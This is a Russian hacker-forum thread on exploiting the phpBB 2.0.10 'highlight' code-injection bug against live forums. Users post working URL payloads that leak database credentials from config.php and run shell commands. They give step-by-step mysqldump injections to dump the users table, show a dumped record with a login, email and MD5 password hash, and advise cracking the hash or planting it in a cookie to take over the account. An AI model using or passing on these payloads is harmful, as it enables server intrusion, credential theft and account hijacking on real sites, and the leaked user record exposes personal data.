Форум АНТИЧАТ - phpbb 2.0.10 тех вопрос

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - phpbb 2.0.10 тех вопрос (https://forum.antichat.xyz/showthread.php?t=3331)

phpbb 2.0.10 тех вопрос

Наткнулся на один форум, там &highlight=%2527.$poster=$dbpasswd.%2527 - бага канает, выводится пасс для бд, так же и логин, но больше ни одна бага не работает, если ковырнуть на &highlight=%2527.$poster=%60$ls%60.%2527&ls=
id;uname%20-a; - выводится )b#i
и всё ни одна из команд не работает, врятли багу там прикрыли, кто нить с этим сталкивался???

если не ошибаюсь %20 - это не тот символ который здесь заменяет пробел...

Вот после этого ты должен писать команды которые там frik написал

id;uname%20-a;

Вроде бы... там так написано типа... потому что закрывать эту всю муть должны вроде б ы символы %2527, нЭ?

Дык ясный день, дело в том что ни одна из команд не работает, типа cd..;pwd;ls -l - думаю понятно что это, в том то и беда, что не работают они, где-то я читал мол значит сервак не под линухом, но каким макаром тогда берётся инфа из config.php с помощью
&highlight=%2527.$poster=$dbpasswd.%2527 ???

Ну тогда не знаю, дай линк хоть на тот форум.

Скорее всего,выключен register globals.
Попробуй вот так:
p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527
Вместо пробела %09
Дамп базы:
p=123&highlight=%2527.$poster=%60/путь/mysqldump%09-uИмяЮзераБазы%09-pПарольБазы%09ИмяБазы%09преф� �кс_users%09>%09db.sql%60.%2527

ИмяЮзераБазы:$poster=$dbuser
ПарольБазы:$poster=$dbpasswd
ИмяБазы:$poster=$dbname
Префикс:$poster=$table_prefix(обычно phpbb_)

X-Seven, а /путь/
чего указывать? Покажи пример...
uИмяЮзераБазы%09- А зачем эта чёрточка в конце?
Вообщем только что проверил - не работает дамп базы.

Вот так типа по этой схеме надо делать:
mysqldump --opt -uLOGIN -pPASS DBNAME > dump.sql

LOGIN=dbuser
PASS=dbpasswd
DBNAME=dbname

Цитата:

Сообщение от X-Seven

Ты прав, register globals выключен, но беда какая-то получается, ставлю вместо пробела - %09 но эфект тот же, зато весь конфиг.пхп вылажен, странно как-то получается =/
Да и если не трудно, то расскажи про путь к дампу.

Насчёт дампа базы.
Mysql-база дампится запросами вида:
mysqldump -u -p dbname > file
После -u должнен идти dbuser,например -uadmin,
после -p dbpasswd,например -ppass,
с dbname,надеюсь,всё ясно.Но т.к. целиком база не нужна,
то нужно ещё указать конкретную её часть,а именно,phpbb_users.
(примечание:название может быть другое,например forum_users,как
узнать префикс,читай выше).
Вместо > лучше писать %3E
file-имя файла,куда должна сдампиться база(теоритически).У меня
phpbb_users просто вывелось на страницу.
ВНИМАНИЕ:В запросе важно указать ПОЛНЫЙ ПУТЬ К МУСКУЛЮ,а точнее,
к файлу mysqldump(путь надо предварительно разведать командами
типа ls или cd).Например,пути могут быть такими:
/usr/local/mysql/bin/mysqldump
/usr/local/bin/mysqldump
/usr/bin/mysqldump

Пример:
Если dbuser=root,dbpasswd=qwerty,dbname=baza,prefix=php bb_,
mysqldump лежит в /usr/bin/,запрос будет таким:

p=123&highlight=%2527.$poster=%60/usr/bin/mysqldump%09-uroot%09-pqwerty%09baza%09phpbb_users%09%3E%09file.sql%60.% 2527

Примечание:вместо всех пробелов надо писать %09,если темы P=123 не
существует,то надо изменить номер,например,на p=321,при копировании
строки запроса в браузер,могут появиться пробелы из-за переноса строки,
их надо удалить.

Если всё прошло удачно,то появится что-то типо этого:
- MySQL dump 8.23 -- -- Host: localhost Database: baze --------------------------------------------------------- -- Server version 3.23.58 -- -- Table structure for table `forum_users`.....

Интерес представляют хэши паролей:
INSERT INTO forum_users VALUES (14,1,'Зелёная','fae0b27c451c728867a567e8c1 bb4e53',1097589801,0,1097589801,1097589772,0,0,0.0 0,1,'russian','D M d, Y g:i a',0,0,0,NULL,1,1,0,1,1,1,1,1,0,1,1,0,'',0,'opa_ho pa@mail.ru','','','Иркутск','','','','','', '','','',NULL);
В данном случае Зелёная-логин,opa_hopa@mail.ru-мыло,на которое логин регился,
fae0b27c451c728867a567e8c1bb4e53 -MD5-хэш,что бы его сломать,надо юзать прогу
MD5Inside.
Примечание:хэш можно подставить в куки вместо своего.

Enjoy!

"We have 63383 registered users

Fatal error: Allowed memory size of 39797528 bytes exhausted (tried to allocate 18352939 bytes) in .../forum/viewtopic.php(1107) : regexp code on line 1
"

Как бороться?

Ну вот что у меня появилось за место nickname у чела вылезло
-- MySQL dump 9.10 -- -- Host: localhost Database: pbb -- ------------------------------------------------------ -- Server version 4.0.18 )\b#i

Всё больше никучего нету. Подскажите что я не так сделал?

Цитата:

Сообщение от PEPSICOLA

Аналогично у меня было, когда пытался ограничить кол-во выводимых записей параметром -w 'user-level=1'. В чем проблема?

Цитата:

Сообщение от PEPSICOLA
Ну вот что у меня появилось за место nickname у чела вылезло
-- MySQL dump 9.10 -- -- Host: localhost Database: pbb -- ------------------------------------------------------ -- Server version 4.0.18 )\b#i

Всё больше никучего нету. Подскажите что я не так сделал?

У меня аналогичное выскакивало когда я неправильно указал префикс(вместо
стандартного phpbb_users надо было forum_users)
Путь к мускулю указан правильный.
Скорее всего,ты где-то ошибся при вводе данных(если dbuser,dbpasswd,dbname и table_prefix указаны верно,то база должна сдампиться).
Ещё в строчку могли попасться лишние пробелы.

Все на много проще. Пофиксили этот баг. Но "лекарство" на рhрbb дано только одно, а версий форумов много и плюс при установке не у всех руки от куда надо росли, от сюда и вылезают всякие ")\b#i" и "MySQL dump 9.10"